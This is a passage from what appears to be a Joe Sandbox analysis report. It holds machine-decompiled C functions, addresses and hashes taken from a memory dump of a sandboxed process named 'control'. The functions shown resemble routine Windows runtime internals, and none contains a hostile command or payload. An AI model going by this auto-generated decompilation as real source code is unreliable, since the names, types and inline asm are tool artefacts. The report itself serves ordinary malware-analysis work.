						_t33 = 0xc00000f1;
					}
				} else {
					_t33 = 0xc00000f0;
				}
				return _t33;
			}

0x04d2cd4e
0x04d2cd57
0x04d2cd63
0x04d2cd70
0x04d2cd92
0x04d2cd96
0x04d2cda7
0x04d2cdaf
0x04d2cdb9
0x04d2cdbd
0x04d2cdc0
0x04d2cdc3
0x04d2cdc7
0x04d2cdc9
0x04d2cdd1
0x04d2cdd2
0x04d2cdd4
0x04d2cdd7
0x04d2cddb
0x04d2cddf
0x04d2cde3
0x04d2cdec
0x04d2cdf0
0x04d2ce05
0x04d2cdf2
0x04d2cdf5
0x04d2cdf5
0x04d2ce0a
0x04d2cd98
0x04d2cd98
0x04d2cd98
0x04d2cd72
0x04d2cd72
0x04d2cd72
0x04d2cd59
0x04d2cd59
0x04d2cd59
0x04d2ce12

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction ID: 7f4e997ff463f7c596fcf5f0bb6c3a9e1c9d965e6102dfea128d9c6beb8be14e
Opcode Fuzzy Hash: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction Fuzzy Hash: F7210172654710ABD3219F18D941B5BBBA4FF88B28F00052EF9499B390D334FD00A7EA

Uniqueness

Uniqueness Score: -1.00%

Function 04D305C6 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04D305C6(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int* _v76;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t48;
				signed int _t49;

				_t45 = __edx;
				_v8 =  *0x4dab370 ^ _t49;
				_t29 =  *[fs:0x30];
				_t48 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t29 = E04CB0FB0(__ecx, __edx, 0x4da666c, 0x4cadd30, 0, 0);
					if( *0x4da32f0 > 5 && E04CADE1A(0x4da32f0, 0, 0x2000) != 0) {
						_t46 =  *0x4da5b24; // 0x2f11e20
						_v76 =  &_v52;
						_v60 =  *((intOrPtr*)(__ecx + 0x28));
						_v52 =  *(__ecx + 0x24) & 0x0000ffff;
						_v44 =  &_v20;
						_t11 = _t46 + 0x28; // 0x2f10fb8
						_t43 = 2;
						_v28 =  *_t11;
						_t13 = _t46 + 0x24; // 0x40003e
						_t45 = 0x4c90cab;
						_v20 =  *_t13 & 0x0000ffff;
						_v68 = 0x4da32f0;
						_v36 = 0x4da32f0;
						_v72 = 0;
						_v64 = 0;
						_v56 = 0;
						_v48 = 0;
						_v40 = 0;
						_v32 = 0;
						_v24 = 0;
						_v16 = 0;
						_t29 = E04D3105C(0x4da32f0, 0x4c90cab, _t43, 0x4da32f0, 6,  &_v108);
					}
				}
				return E04CF4B50(_t29, 0x4da32f0, _v8 ^ _t49, _t45, 0, _t48);
			}

0x04d305c6
0x04d305d5
0x04d305d8
0x04d305e3
0x04d305e8
0x04d305fa
0x04d30606
0x04d3061e
0x04d30627
0x04d3062d
0x04d30634
0x04d3063a
0x04d3063d
0x04d30642
0x04d30643
0x04d30646
0x04d3064a
0x04d3064f
0x04d30659
0x04d3065c
0x04d30662
0x04d30665
0x04d30668
0x04d3066b
0x04d3066e
0x04d30671
0x04d30674
0x04d30677
0x04d3067a
0x04d3067a
0x04d30606
0x04d3068d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5996636dfbbb1be870378178cb04961a29d19f5ca988b3355fd5b14a091105
Instruction ID: d92c7c6ed3bccf07e22148388df670c549ea94a42d8e9a07a8540279793d687f
Opcode Fuzzy Hash: 9e5996636dfbbb1be870378178cb04961a29d19f5ca988b3355fd5b14a091105
Instruction Fuzzy Hash: DF2114B0E00208EBDB10CFAAD881AAEFBF9FF98704F10012BE415A7244D774A941CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA22B Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E04CEA22B(void* __ecx, void* __edx) {
				char _v8;
				void* _t22;
				void* _t47;
				intOrPtr* _t51;
				short* _t55;

				_push(__ecx);
				if( *0x4da680c != 0) {
					L4:
					_t22 = 1;
					L5:
					return _t22;
				}
				_t55 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x20);
				if(_t55 == 0) {
					L7:
					_t22 = 0;
					goto L5;
				}
				_push(0);
				if(E04CEA2E0( &_v8, 0x4da4790) < 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					goto L7;
				}
				_t51 =  *((intOrPtr*)(_v8 + 0x10)) + _v8;
				_t47 =  *_t51 + _t51;
				 *_t55 =  *((intOrPtr*)(_t47 + 0x18));
				 *((short*)(_t55 + 4)) =  *((intOrPtr*)(_t47 + 0x16));
				 *((short*)(_t55 + 2)) =  *((intOrPtr*)(_t47 + 0x20));
				 *((short*)(_t55 + 0x1c)) =  *((intOrPtr*)(_t47 + 0x1a));
				 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t47 + 0x1c)) + _t51;
				 *((intOrPtr*)(_t55 + 0xc)) =  *((intOrPtr*)(_t47 + 0x24)) + _t51;
				 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t47 + 0x28)) + _t51;
				 *((intOrPtr*)(_t55 + 0x14)) =  *((intOrPtr*)(_t47 + 0x38)) + _t51;
				asm("lock cmpxchg [edx], ecx");
				if(0 != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
				}
				goto L4;
			}

0x04cea230
0x04cea239
0x04cea2d3
0x04cea2d3
0x04cea2d5
0x04cea2d7
0x04cea2d7
0x04cea251
0x04cea255
0x04d263d0
0x04d263d0
0x00000000
0x04d263d0
0x04cea25b
0x04cea26d
0x04d263cb
0x00000000
0x04d263cb
0x04cea279
0x04cea27d
0x04cea283
0x04cea28a
0x04cea292
0x04cea29a
0x04cea2a3
0x04cea2ab
0x04cea2b3
0x04cea2c2
0x04cea2c7
0x04cea2cd
0x04d263e3
0x04d263e3
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85296fdf29d8531d180e86e3c9ecabfcbfcc97bd1019c895c21f69e339f629c8
Instruction ID: e4bf5366854f3b5d6a94acb51152ef25e079edf82904f80c520e19a7d4bc238f
Opcode Fuzzy Hash: 85296fdf29d8531d180e86e3c9ecabfcbfcc97bd1019c895c21f69e339f629c8
Instruction Fuzzy Hash: 66219A356007509FCB25DF29C900B66B3F6EF48B08F188468E509DB762E332F842DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04CB8690 Relevance: .1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04CB8690(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t31;
				intOrPtr* _t36;

				_t29 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t36 = 0;
				_v8 = __edx;
				_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_t24 = 0;
				_t31 = __ecx;
				if(_t15 != 0) {
					_t24 = _t15 + 0x7e0;
					if(_t24 == 0 ||  *((intOrPtr*)(_t24 + 0x30)) == 0) {
						_t24 = _t36;
					}
				}
				if(_t29 == 0) {
					L10:
					return _t36;
				} else {
					_t27 = _a4;
					if(_t27 == 0 || _t24 == 0) {
						goto L10;
					} else {
						if(_t31 == 0) {
							 *_t27 =  *_t24;
							 *((intOrPtr*)(_t27 + 4)) =  *((intOrPtr*)(_t24 + 4));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L9:
							_t36 = 1;
							goto L10;
						}
						if(_t31 != 1) {
							goto L10;
						}
						L04CB53C0(0x4da689c);
						_t28 = _a4;
						asm("movsd");
						 *_t28 =  *_t24;
						 *((intOrPtr*)(_t28 + 4)) =  *((intOrPtr*)(_t24 + 4));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E04CB52F0(_t28, 0x4da689c);
						goto L9;
					}
				}
			}

0x04cb8690
0x04cb8695
0x04cb8696
0x04cb869f
0x04cb86a1
0x04cb86a4
0x04cb86aa
0x04cb86ad
0x04cb86b1
0x04cb86b3
0x04cb86bb
0x04cb8726
0x04cb8726
0x04cb86bb
0x04cb86c4
0x04cb8708
0x04cb870e
0x04cb86c6
0x04cb86c6
0x04cb86cb
0x00000000
0x04cb86d1
0x04cb86d3
0x04cb8718
0x04cb871d
0x04cb8720
0x04cb8721
0x04cb8722
0x04cb8723
0x04cb8705
0x04cb8707
0x00000000
0x04cb8707
0x04cb86d8
0x00000000
0x00000000
0x04cb86df
0x04cb86ea
0x04cb86f4
0x04cb86f5
0x04cb86fa
0x04cb86fd
0x04cb86fe
0x04cb86ff
0x04cb8700
0x00000000
0x04cb8700
0x04cb86cb

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be31b9a72bb68ddee749c222eb2e5c2eac95a0b90d2d9f836373ffb07e8163d6
Instruction ID: 7b842444e24b028dd729b8d9ddb503af1f8cc63ab1b7478f9fb096c092ef3921
Opcode Fuzzy Hash: be31b9a72bb68ddee749c222eb2e5c2eac95a0b90d2d9f836373ffb07e8163d6
Instruction Fuzzy Hash: 2711C835701611DB8B11DF5AC4C0A9AB7EEAF46758F1840A9FD48AF304D6B2FA018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0044 Relevance: .1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04CE0044(intOrPtr __ecx, intOrPtr* _a4) {
				char _v8;
				char _v12;
				void* _t20;
				intOrPtr _t32;
				signed int _t35;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;

				_push(__ecx);
				_push(__ecx);
				_t41 = 0;
				_t32 = __ecx;
				if( *_a4 != 0) {
					L8:
					_t20 = _t41;
					L9:
					return _t20;
				}
				if(__ecx <= 1) {
					_t32 = 0x25;
				}
				_t35 = 0x10;
				_t2 = _t32 - 1; // 0x24
				_t20 = E04CE4CF8( &_v12, _t2 * _t35, _t2 * _t35 >> 0x20);
				if(_t20 < 0) {
					goto L9;
				} else {
					_t37 = _v12;
					_push( &_v8);
					_t39 = 0x34;
					_t41 = E04CA94A3(_v12, _t39);
					if(_t41 >= 0) {
						_t44 = E04CC5D90(_t37,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
						if(_t44 == 0) {
							_t41 = 0xc0000017;
						} else {
							E04CF8F40(_t44, 0, _v8);
							 *((intOrPtr*)(_t44 + 0x2c)) = _t32;
							_t14 = _t44 + 0xc; // 0xc
							E04CEB440(0x3fff, 0x80000008, _t14);
							 *(_t44 + 8) =  *(_t44 + 8) & 0x00000000;
							 *_t44 = 0x6d6f7441;
							 *((intOrPtr*)(_t44 + 4)) = 1;
							 *_a4 = _t44;
						}
					}
					goto L8;
				}
			}

0x04ce0049
0x04ce004a
0x04ce0050
0x04ce0052
0x04ce0056
0x04ce00e4
0x04ce00e4
0x04ce00e6
0x04ce00e9
0x04ce00e9
0x04ce005f
0x04ce0063
0x04ce0063
0x04ce0066
0x04ce0067
0x04ce0071
0x04ce0078
0x00000000
0x04ce007a
0x04ce007a
0x04ce0080
0x04ce0083
0x04ce0089
0x04ce008d
0x04ce00a3
0x04ce00a7
0x04ce00ec
0x04ce00a9
0x04ce00af
0x04ce00b7
0x04ce00ba
0x04ce00c8
0x04ce00d0
0x04ce00d4
0x04ce00da
0x04ce00e1
0x04ce00e1
0x04ce00e3
0x00000000
0x04ce008d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction ID: 1f8f75dfa2fa206598a758eb10cb81a907b62d29f57dfa8b69208c37c61007c3
Opcode Fuzzy Hash: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction Fuzzy Hash: C011E672600614BFEB229F46D845FAEB7AAEB80768F10402AE6009B140D7B1FE45D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CB8009 Relevance: .1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E04CB8009(signed int* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr* _t33;
				intOrPtr _t37;
				intOrPtr _t40;
				intOrPtr* _t41;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;

				_t45 =  *[fs:0x18];
				_v28 = __ecx;
				 *__ecx =  *__ecx & 0x00000000;
				_t25 =  *0x4da6644; // 0x0
				_v24 = _t45;
				_t29 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x002c0000 | 0x00000008, 0x60);
				_t40 = _t29;
				_v20 = _t40;
				if(_t40 == 0) {
					 *(_t45 + 0xf90) =  *(_t45 + 0xf90) & 0x00000000;
					return _t29;
				}
				 *(_t40 + 4) =  *(_t40 + 4) | 0x00000003;
				_t41 = 0x7ffe03b0;
				while(1) {
					_v12 =  *((intOrPtr*)(_t41 + 4));
					_v8 =  *_t41;
					while(1) {
						_t44 =  *0x7FFE000C;
						_t50 =  *0x7FFE0008;
						if(_t44 ==  *0x7ffe0010) {
							break;
						}
						asm("pause");
					}
					_t37 = _v12;
					_t41 = 0x7ffe03b0;
					_t47 =  *0x7FFE03B4;
					if(_v8 !=  *0x7ffe03b0 || _t37 != _t47) {
						asm("pause");
						continue;
					} else {
						_t43 = _v20;
						_t33 = _v28;
						asm("sbb edx, ebx");
						 *((intOrPtr*)(_t43 + 0x10)) = _t50 - _v8;
						 *((intOrPtr*)(_t43 + 0x14)) = _t44;
						 *((intOrPtr*)(_v24 + 0xf90)) = _t43;
						 *_t33 = _t43;
						return _t33;
					}
				}
			}

0x04cb8014
0x04cb801b
0x04cb801e
0x04cb8021
0x04cb802b
0x04cb803d
0x04cb8042
0x04cb8044
0x04cb8049
0x04cb80b1
0x00000000
0x04cb80b1
0x04cb804b
0x04cb804f
0x04cb8056
0x04cb8060
0x04cb8063
0x04cb806c
0x04cb806c
0x04cb806e
0x04cb8074
0x00000000
0x00000000
0x04cb8076
0x04cb8076
0x04cb807a
0x04cb807d
0x04cb8084
0x04cb808a
0x04cb80ba
0x00000000
0x04cb8090
0x04cb8090
0x04cb8099
0x04cb809c
0x04cb809e
0x04cb80a1
0x04cb80a5
0x04cb80ab
0x00000000
0x04cb80ad
0x04cb808a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8a12e3e4ca005632d25caa8342ee9c93728cad6f26a4128a984f36e563c44b
Instruction ID: 99675bcd1a83e4ff27f648fa216d189d1b63a0706bcbd050c8de1a8115eccc7e
Opcode Fuzzy Hash: 1e8a12e3e4ca005632d25caa8342ee9c93728cad6f26a4128a984f36e563c44b
Instruction Fuzzy Hash: 1B217975A00605DFCB14CF98D580AAABBBAFB88718F24416DD145AB350DB71BE02CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04D3CD00 Relevance: .1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04D3CD00(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v16;
				void* _t12;
				intOrPtr _t14;
				void* _t24;
				void* _t28;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr* _t44;

				_push(__ecx);
				if(( *0x4da391c & 0x00000004) != 0) {
					L04CC2330(_t12, 0x4da67d4);
					_t44 = _a4;
					_t14 =  *_t44;
					if( *((intOrPtr*)(_t14 + 4)) != _t44) {
						L8:
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t36 = _v16;
						if(_t36 == 0 || (_t36 & ( !(E04CD014D()) | 0x00000100)) != 0) {
							return 0xc000000d;
						} else {
							 *0x4da68f0 = _t36;
							return 0;
						}
					}
					_t37 =  *((intOrPtr*)(_t44 + 4));
					if( *_t37 != _t44) {
						goto L8;
					}
					 *_t37 = _t14;
					 *((intOrPtr*)(_t14 + 4)) = _t37;
					 *0x4da33e0 =  *0x4da33e0 + 0xfffe -  *((intOrPtr*)(_t44 + 8));
					L04CC2330(E04CC24D0(0x4da67d4), 0x4da67c4);
					_t24 = E04CED532(0x4da4fe0);
					_t41 = _t24;
					E04CC24D0(0x4da67c4);
					if(_t24 != 0) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t41);
					}
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t44);
					_t28 = 0;
				} else {
					_t28 = 0xc000000d;
				}
				return _t28;
			}

0x04d3cd08
0x04d3cd13
0x04d3cd29
0x04d3cd2e
0x04d3cd31
0x04d3cd36
0x04d3cda4
0x04d3cda4
0x04d3cda7
0x04d3cda9
0x04d3cdaa
0x04d3cdab
0x04d3cdac
0x04d3cdad
0x04d3cdae
0x04d3cdaf
0x04d3cdb5
0x04d3cdba
0x00000000
0x04d3cdcc
0x04d3cdcc
0x00000000
0x04d3cdd2
0x04d3cdba
0x04d3cd38
0x04d3cd3d
0x00000000
0x00000000
0x04d3cd3f
0x04d3cd41
0x04d3cd4d
0x04d3cd60
0x04d3cd6a
0x04d3cd70
0x04d3cd72
0x04d3cd79
0x04d3cd87
0x04d3cd87
0x04d3cd98
0x04d3cd9d
0x04d3cd15
0x04d3cd15
0x04d3cd15
0x04d3cd20

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f563a8c0a16202c6e2cdc048f803ba3e5b558d37eb3e8f5252f125e3636dad41
Instruction ID: 179a780c1d11fa1eeb447913b9ff8f07a0e73062baf938104ba44cf4a5303450
Opcode Fuzzy Hash: f563a8c0a16202c6e2cdc048f803ba3e5b558d37eb3e8f5252f125e3636dad41
Instruction Fuzzy Hash: 45112932560640ABE721AB24E850F267BBAEF81B69F14446CF9455B690CA34FC01E7D0

Uniqueness

Uniqueness Score: -1.00%

Function 04CE666D Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CE666D(intOrPtr __ecx) {
				signed int _v8;
				signed int _t23;
				signed int _t24;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr _t47;

				_push(__ecx);
				_t47 =  *[fs:0x30];
				_t44 = __ecx;
				_t41 =  *(_t47 + 0x88);
				_t38 = ( *0x4da6624 & 0x0000ffff) + _t41;
				if(_t38 >= 0xfffe) {
					L4:
					return _t23;
				}
				_t24 =  *(_t47 + 0x8c);
				if(_t38 == _t24) {
					 *(_t47 + 0x8c) = _t24 + _t24;
					_t23 = E04CC5D90(_t41,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t24 + _t24 << 2);
					_t42 = _t23;
					_v8 = _t42;
					if(_t42 == 0) {
						 *(_t47 + 0x8c) = _t38;
						goto L4;
					}
					E04CF88C0(_t42,  *(_t47 + 0x90),  *(_t47 + 0x88) << 2);
					_t31 =  *(_t47 + 0x90);
					if( *(_t47 + 0x90) != 0x4da4840) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
					}
					_t41 =  *(_t47 + 0x88);
					 *(_t47 + 0x90) = _v8;
				}
				 *((intOrPtr*)( *(_t47 + 0x90) + _t41 * 4)) = _t44;
				 *(_t47 + 0x88) =  *(_t47 + 0x88) + 1;
				_t23 =  *(_t47 + 0x88) & 0x0000ffff;
				if( *((intOrPtr*)(_t44 + 8)) == 0xddeeddee) {
					 *(_t44 + 0x14) = _t23;
				} else {
					 *(_t44 + 0x7c) = _t23;
				}
				goto L4;
			}

0x04ce6672
0x04ce6675
0x04ce6684
0x04ce6686
0x04ce668c
0x04ce6694
0x04ce66c3
0x04ce66c7
0x04ce66c7
0x04ce6696
0x04ce669e
0x04ce66ca
0x04ce66df
0x04ce66e4
0x04ce66e6
0x04ce66eb
0x04ce672b
0x00000000
0x04ce672b
0x04ce66fe
0x04ce6703
0x04ce6711
0x04d24173
0x04d24173
0x04ce671a
0x04ce6720
0x04ce6720
0x04ce66a6
0x04ce66a9
0x04ce66b6
0x04ce66bd
0x04ce6733
0x04ce66bf
0x04ce66bf
0x04ce66bf
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3df74bdf537ccb68bfa2ba464679fa42115de469200f8ad78aff72f2e22e6b
Instruction ID: 8ae1830c0c10fd8e1efd4c1b16d83b4ef109addd70a1558904194face2eb771c
Opcode Fuzzy Hash: 4f3df74bdf537ccb68bfa2ba464679fa42115de469200f8ad78aff72f2e22e6b
Instruction Fuzzy Hash: 61218871620A00EFD7208F2AD880F72B7EAFB54754F84882DE59AD7260DB30B950DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D46400 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04D46400(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int* _a8) {
				char _v8;
				void* _t14;
				intOrPtr _t15;
				intOrPtr _t25;
				void* _t27;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;
				signed int _t37;

				_push(__ecx);
				_t25 = _a4;
				 *_a8 =  *_a8 & 0x00000000;
				if(E04D464B0(__ecx, _t25,  &_v8) < 0 || _v8 != 1) {
					_t14 = 0xc000000d;
				} else {
					_t15 =  *0x4da5d78; // 0x0
					_t37 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t15 + 0x140000, 0x28);
					if(_t37 != 0) {
						_t34 = E04CD82F0(_t37, 0x4c856f8, 8);
						if(_t34 < 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
						} else {
							_t6 = _t37 + 8; // 0x8
							_t29 = _t6;
							_t27 = _t25 - _t37;
							_t31 = 8;
							do {
								 *_t29 =  *((intOrPtr*)(_t27 + _t29));
								_t29 = _t29 + 4;
								_t31 = _t31 - 1;
							} while (_t31 != 0);
							_t34 = 0;
							 *_a8 = _t37;
						}
						_t14 = _t34;
					} else {
						_t14 = 0xc000009a;
					}
				}
				return _t14;
			}

0x04d46405
0x04d4640a
0x04d4640e
0x04d4641e
0x04d46494
0x04d46426
0x04d46426
0x04d46441
0x04d46445
0x04d4645b
0x04d4645f
0x04d4648b
0x04d46461
0x04d46463
0x04d46463
0x04d46466
0x04d46468
0x04d46469
0x04d4646c
0x04d4646e
0x04d46471
0x04d46471
0x04d46479
0x04d4647b
0x04d4647b
0x04d46490
0x04d46447
0x04d46447
0x04d46447
0x04d46445
0x04d4649d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e614fcbb122ff93f1c89fb38a911821e16be0880c899e9285ffde85deaa7b61
Instruction ID: 1102eab69e8e6491214eb063895d55abc3458636128b028bed7f9d68b3882b6a
Opcode Fuzzy Hash: 6e614fcbb122ff93f1c89fb38a911821e16be0880c899e9285ffde85deaa7b61
Instruction Fuzzy Hash: 7E11A332384600BFDB22DFA9DD40F5A77A9EB86B54F014029F60ADB251DA78F905C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CDE7E0 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04CDE7E0(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t12;
				intOrPtr _t14;
				signed int _t18;
				signed int _t23;
				signed char _t30;
				signed int _t32;
				signed int _t38;

				_push(__ecx);
				_push(__ecx);
				L04CC2330(_t12, 0x4da67c4);
				_t14 = _a4;
				 *(_t14 - 0x1c) =  *(_t14 - 0x1c) - 1;
				asm("sbb edi, edi");
				_t38 =  !( ~( *(_t14 - 0x1c))) & _t14 + 0xffffffb0;
				_v8 = _t38;
				asm("lock cmpxchg [ebx], ecx");
				_t32 = 1;
				if(1 != 1) {
					while(1) {
						_t23 = _t32 & 0x00000006;
						_t18 = _t32;
						_t30 = (0 | _t23 == 0x00000002) * 4 - 1 + _t32;
						asm("lock cmpxchg [edi], esi");
						if(_t18 == _t32) {
							break;
						}
						_t32 = _t18;
					}
					_t38 = _v8;
					if(_t23 == 2) {
						_t18 = E04CE3BDB(0x4da67c4, 0, _t30);
					}
				}
				if(_t38 != 0) {
					_t18 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
				}
				return _t18;
			}

0x04cde7e5
0x04cde7e6
0x04cde7f0
0x04cde7f5
0x04cde7f8
0x04cde803
0x04cde809
0x04cde80d
0x04cde811
0x04cde815
0x04cde81a
0x04d1fafe
0x04d1fb02
0x04d1fb05
0x04d1fb14
0x04d1fb18
0x04d1fb1e
0x00000000
0x00000000
0x04d1fb20
0x04d1fb20
0x04d1fb24
0x04d1fb2a
0x04d1fb38
0x04d1fb38
0x04d1fb2a
0x04cde822
0x04cde837
0x04cde837
0x04cde828

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

